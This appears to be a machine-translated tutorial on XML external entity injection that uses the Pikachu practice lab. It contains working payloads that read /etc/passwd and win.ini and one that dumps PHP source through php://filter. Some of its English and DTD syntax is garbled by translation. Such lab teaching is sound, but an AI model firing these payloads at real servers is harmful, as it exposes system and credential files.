XXE - "xml external entity injection"
both "xml external entity injection vulnerability."
Summarize is "the attacker by injecting specified xml entity to the server content, allowing the server to perform in accordance with the specified configuration, cause problems."
That server receives and parses a client from the xml data, but do not strictly security control, leading to an external entity xml injection.
Specifically with regard to introduction xml entity, there are many on the web, check yourself first.
Now many languages inside the corresponding analytical xml function is disabled by default to resolve external entities content and, thus, avoid direct this vulnerability.
With PHP, for example, xml parsing in PHP which use the libxml, which ≥2.9.0 version, is disabled by default xml parsing the content of external entities.
The first part: XML declaration section
<?xml version="1.0"?>
Part II: Document Type Definition DTD
<! DOCTYPE note [ <-! This document is a note-defined type of document - > ! < ENTITY the Entity-name the SYSTEM "URI of the / the URL of" > <-! External entity declarations -> ]>
Part III: document element
<note> <to>Dave</to> <from>Tom</from> <head>Reminder</head> <body>You are a good man</body> </note>
Which, DTD ( the Document Type Definition , document type definition), used for the XML document defines the syntax constraints can be declared inside can also reference an external DTD Now many languages inside the corresponding analytical xml function is disabled by default to resolve external entities content and, thus, avoid direct this vulnerability.
① internal affirmed DTD format <! DOCTYPE root element [ element declaration ] >
② external reference DTD format <! DOCTYPE root element SYSTEM " external DTD the URI of the" >
③ cited public DTD format <! DOCTYPE root element PUBLIC "DTD Distinguished Name ", " public DTD the URI of the" >
External entity references Payload
<?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY f SYSTEM "file:///etc/passwd"> ]> <x>&f;</x>
1.PHP has a function simplexml_load_string () in the form of good xml string into SimpleXMLElement objects
In PHP parsing inside xml use the libxml , which ≥2.9.0 version, it is disabled by default resolve xml external entity content.
This chapter provides a case in order to simulate vulnerability, Pikachu manually specify the platform LIBXML_NOENT option opens the xml external entity resolution.
2 to submit a normal xml data
<?xml version = "1.0"?><!DOCTYPE note [ <!ENTITY hacker "test"> ]><name>&hacker;</name>
3. If we submit such a following payload , will be able to see the contents of files on the server
<?xml version = "1.0"?><!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://Windows//win.ini"> ]><x>&f;</x>
4. Try php pseudo protocol, print out the base64 encoded xxe.php page,
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>
